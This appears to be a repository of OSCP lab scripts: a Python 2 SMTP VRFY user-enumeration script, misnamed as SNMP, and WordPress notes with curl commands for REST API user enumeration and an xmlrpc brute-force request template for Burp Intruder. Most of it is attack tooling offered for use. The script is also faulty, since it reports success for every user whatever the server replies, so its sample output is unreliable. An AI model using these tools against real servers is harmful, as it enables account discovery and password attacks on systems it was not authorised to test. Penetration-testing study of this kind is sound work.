├── README.md
├── Wordpress.md
└── snmp_user_discovery.py
/README.md:
--------------------------------------------------------------------------------
1 | # oscp-scripts
2 | Scripts created to use with the OSCP exercises
3 |
4 | ## snmp_user_discovery.py
5 | *Requires python2*
6 |
7 | Use this script to scan a list of ip addresess for a list of usernames
8 |
9 |
10 | ### Example usage
11 | ```
12 | # ./snmp_user_discovery.py users.txt ips.txt
13 | ['root', 'admin', 'administrator', 'webadmin', 'sysadmin', 'netadmin', 'guest', 'user', 'web', 'test', 'jenny', 'joe45', 'john', 'marcus', 'ryuu']
14 | ['10.11.1.227', '10.11.1.72', '10.11.1.115', '10.11.1.217', '10.11.1.231', '10.11.1.241']
15 | testing user root on ip 10.11.1.227
16 | successful connection to ip 10.11.1.227 for user root
17 | testing user admin on ip 10.11.1.227
18 | successful connection to ip 10.11.1.227 for user admin
19 | testing user administrator on ip 10.11.1.227
20 | successful connection to ip 10.11.1.227 for user administrator
21 | testing user webadmin on ip 10.11.1.227
22 | successful connection to ip 10.11.1.227 for user webadmin
23 | testing user sysadmin on ip 10.11.1.227
24 | successful connection to ip 10.11.1.227 for user sysadmin
25 | testing user netadmin on ip 10.11.1.227
26 | successful connection to ip 10.11.1.227 for user netadmin
27 | testing user guest on ip 10.11.1.227
28 | successful connection to ip 10.11.1.227 for user guest
29 | testing user user on ip 10.11.1.227
30 | successful connection to ip 10.11.1.227 for user user
31 | testing user web on ip 10.11.1.227
32 | successful connection to ip 10.11.1.227 for user web
33 | testing user test on ip 10.11.1.227
34 | successful connection to ip 10.11.1.227 for user test
35 | testing user jenny on ip 10.11.1.227
36 | successful connection to ip 10.11.1.227 for user jenny
37 | testing user joe45 on ip 10.11.1.227
38 | successful connection to ip 10.11.1.227 for user joe45
39 | testing user john on ip 10.11.1.227
40 | successful connection to ip 10.11.1.227 for user john
41 | testing user marcus on ip 10.11.1.227
42 | successful connection to ip 10.11.1.227 for user marcus
43 | testing user ryuu on ip 10.11.1.227
44 | successful connection to ip 10.11.1.227 for user ryuu
45 | ```
46 |
47 | ### users.txt
48 | ```
49 | root
50 | admin
51 | administrator
52 | webadmin
53 | sysadmin
54 | netadmin
55 | guest
56 | user
57 | web
58 | test
59 | jenny
60 | joe45
61 | john
62 | marcus
63 | ryuu
64 | ```
65 |
66 | ### ips.txt
67 | ```
68 | 10.11.1.72
69 | 10.11.1.115
70 | 10.11.1.217
71 | 10.11.1.227
72 | 10.11.1.231
73 | 10.11.1.241
74 | ```
75 |
--------------------------------------------------------------------------------
/Wordpress.md:
--------------------------------------------------------------------------------
1 | # Pentesting Wordpress
2 |
3 | ## Rest API User Enumeration
4 |
5 | curl -k https://$DOMAIN/wp-json/wp/v2/users
6 | curl -k https://$DOMAIN/wp-json/akismet/v1
7 | curl -k https://$DOMAIN/wp-json
8 | curl -k https://$DOMAIN/wp-json/wp/v2/pages
9 |
10 | ## Brute Force Login
11 |
12 | ### List all methods
13 |
14 | curl -L \
15 | -X POST \
16 | -d ' system.listMethods ' \
17 | https://$DOMAIN/xmlrpc.php
18 |
19 |
20 | ### POST Request
21 | This is used for the brute force login. Replace $DOMAIN with the domain you are attacking. Use Burp Suite Intruder to attack.
22 |
23 | ```
24 | POST //xmlrpc.php HTTP/1.1
25 | Content-Type: application/x-www-form-urlencoded
26 | Cookie: wordpress_test_cookie=WP%20Cookie%20check
27 | Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Encoding: gzip,deflate
28 | Content-Length: 264
29 | Host: $DOMAIN
30 | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.61 Safari/537.36
31 | Connection: Keep-alive
32 |
33 | wp.getUsersBlogs
34 | admin
35 | 894437894437534447
36 |
37 |
38 | ```
39 |
--------------------------------------------------------------------------------
/snmp_user_discovery.py:
--------------------------------------------------------------------------------
1 | #!/usr/bin/python
2 | #snmp_user_discovery.py
3 | import socket
4 | import sys
5 | if len(sys.argv) != 3:
6 | print "Usage: snmp_user_discovery.py "
7 | sys.exit(0)
8 |
9 |
10 | def gen_user_list(users):
11 | users_list = []
12 | with open(users, "r") as file:
13 | for user in file:
14 | users_list.append(user.strip("\n"))
15 | return users_list
16 |
17 | def gen_rhost_list(rhosts):
18 | rhosts_list = []
19 | with open(rhosts, "r") as file:
20 | for host in file:
21 | rhosts_list.append(host.strip("\n"))
22 | return rhosts_list
23 |
24 | def send_verify(ip, user):
25 | s=socket.socket(socket.AF_INET, socket.SOCK_STREAM)
26 | s.settimeout(2)
27 | print("testing user {} on ip {}".format(user, ip))
28 | try:
29 | connect=s.connect((ip,25))
30 | banner=s.recv(1024)
31 | data = b'VRFY ' + user.encode() + b'\r\n'
32 | s.send(data)
33 | result = s.recv(1024)
34 | print("successful connection to ip {} for user {}".format(ip, user))
35 | return user
36 | s.close()
37 | except Exception:
38 | return False
39 | def main():
40 | hostFile=sys.argv[2]
41 | ipFile=sys.argv[1]
42 | rhosts = gen_rhost_list(hostFile)
43 | users = gen_user_list(ipFile)
44 | print (users)
45 | print (rhosts)
46 |
47 | for ip in rhosts:
48 | for user in users:
49 | send_verify(ip, user)
50 |
51 |
52 | if __name__ == "__main__":
53 | main()
54 |
--------------------------------------------------------------------------------